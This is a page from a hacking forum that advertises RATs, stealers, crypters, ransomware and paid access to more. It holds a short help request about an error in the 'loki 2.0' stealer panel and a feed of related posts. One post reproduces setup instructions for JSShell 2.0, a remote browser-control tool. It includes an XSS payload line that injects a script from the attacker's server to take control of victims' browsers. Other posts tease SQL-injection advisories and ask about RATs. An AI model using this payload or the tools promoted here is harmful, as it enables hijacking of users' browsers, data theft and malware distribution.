Welcome to The Forum

Register now to gain access to all of our features. Once registered and logged in, you will be able to create topics, post replies to

existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile

and so much more. This message will be removed once you have signed in.

Active Hackers

The best community of active hackers. This community has been working in hacking for more than 10 years.

Hacker Forum

Hacker from all countries join this community to share their knowledge and their hacking tools

 

    Hacking Tools

    You can find thousands of tools shared by hackers. RAT's, Bot's, Crypters FUD, Stealers, Binders, Ransomware,, Mallware, Virus, Cracked Accounts, Configs, Guides, Videos and many other things.

      PRIV8

      Become a Priv8 user and access all parts of the forum without restrictions and without limit of download. It only costs 100 dollars, and it will last you for a lifetime.

      Read Rules

      In this community we follow and respect rules, and they are the same for everyone, regardless of the user's rank. Read the rules well not to be prohibited.

      • 0
      Sign in to follow this  
      nexus1981

      loki 2.0 error

      Question

      i need help  pleese    MESSAGE: Execute failed: (1364) Field 'cookie' doesn't have a default value
      ERROR:

      Share this post


      Link to post
      Share on other sites

      5 answers to this question

      Guest
      This topic is now closed to further replies.
      Sign in to follow this  

      • Similar Content

        • By dEEpEst
          JSShell 2.0

          Hidden Content
          Give reaction to this post to see the hidden content.   Hidden Content
          Give reaction to this post to see the hidden content.   Hidden Content
          Give reaction to this post to see the hidden content. An interactive multi-user web based javascript shell. It was initially created in order to debug remote esoteric browsers during experiments and research. This tool can be easily attached to XSS (Cross Site Scripting) payload to achieve browser remote code execution (similar to the BeeF framework).
          Version 2.0 is created entirely from scratch, introducing new exciting features, stability and maintainability.
          Version: 2.0
          Author

          Hidden Content
          Give reaction to this post to see the hidden content. . Shell Video

          Hidden Content
          Give reaction to this post to see the hidden content. Features
          Multi client support Cyclic DOM objects support Pre flight scripts Command Queue & Context Extensible with Plugins Injectable via <script> tags Dumping command output to file Shell pagination Installation & Setup
          Config File
          In the resources directory, update the config.json file with your desired configuration:
          Database host - if running with the docker deployment method, choose the database host as db (which is the internal host name). Return URL - the URL which the requests will follow. The shell.js file does some AJAX calls to register and poll for new commands. Usually it will be http://{YOUR_SERVER_IP}:{PORT}. Startup script - a script that runs automatically when the JSShell CLI client is spawned. It is also possible to point at a remote database if desired. Docker
          This new version instructed installing and running via docker and docker-compose. Now, to install and run the entire JSShell framework, simply run:
          $ ./start_docker_shell.sh This will:
          Start and create the database in the background Start the web API server that handles incoming connections in the background Spawn a new instance of the JSShell command line interface container Regular
          If you still want to use the old fashion method of installing, simply make sure you have a MongoDB database up and running, and update the config.json file residing in the resources directory.
          I recommend using a virtual environment with pyenv:
          $ pyenv virtualenv -p python3.6 venv $ pyenv activate venv Or using virtualenv:
          $ virtualenv -p python3.6 venv $ source venv/bin/activate Then, install the requirements:
          $ pip install -r requirements.txt Running
          If you used the docker method, there's no need to run the following procedure.
          Web Server
          Otherwise, once we have the database setup, we need to start the web API server. To do, run:
          $ python manage.py web This will create and run a web server that listens to incoming connections and serves our JSShell code.
          Shell
          Now to start the JSShell CLI, run the same script but now with the shell flag:
          $ python manage.py shell Usage
          After setup and running the required components, enter the help command to see the available commands:
          ╦╔═╗┌─┐┬ ┬┌─┐┬ ┬ ║╚═╗└─┐├─┤├┤ │ │ ╚╝╚═╝└─┘┴ ┴└─┘┴─┘┴─┘ 2.0 by @Daniel_Abeles >> help Documented commands (type help <topic>): General Commands -------------------------------------------------------------------------------- edit Edit a file in a text editor help List available commands or provide detailed help for a specific command history View, run, edit, save, or clear previously entered commands ipy Enter an interactive IPython shell py Invoke Python command or shell quit Exit this application Shell Based Operations -------------------------------------------------------------------------------- back Un-select the current selected client clients List and control the clients that have registered to our system commands Show the executed commands on the selected client dump Dumps a command to the disk execute Execute commands on the selected client select Select a client as the current client >> Flow
          JSShell supports 2 methods of operation:
          Injectable Shell (similar to BeeF framework) Hosted Shell (for debugging) Injectable Shell
          Similar to other XSS control frameworks (like BeeF), JSShell is capable of managing successful XSS exploitations. In example, if you can inject a script tag, inject the following resource to your payload, and a new client will appear in your console:
          <script src="http://{YOUR_SERVER_IP}:{PORT}/content/js"></script>
          Hosted Shell
          If you desire to debug exotic and esoteric browsers, you can simply navigate to http://{YOUR_SERVER_IP}:{PORT}/ and a new client will pop up into your JSShell CLI client. Now it is debuggable via our JSShell console.
          Download:

          Hidden Content
          Give reaction to this post to see the hidden content.
        • By 1337day-Exploits
          Joomla ExtCalendar version 2.0 suffers from a remote SQL injection vulnerability.

          Hidden Content
          Give reaction to this post to see the hidden content.
        • By Manifest
          Hello everyone

          Does anyone have any experience with GovRat 2.0  - DNSMessenger or possibly knows an alternative?

          Have tested (RAT) in my life apparently the two listed above are exactly what I need. Unfortunately, I still lack some information and experience

          Greeting

          Hidden Content
          Give reaction to this post to see the hidden content.
        • By 1337day-Exploits
          Real Estate Custom Script version 2.0 suffers from a remote SQL injection vulnerability.

          Hidden Content
          Give reaction to this post to see the hidden content.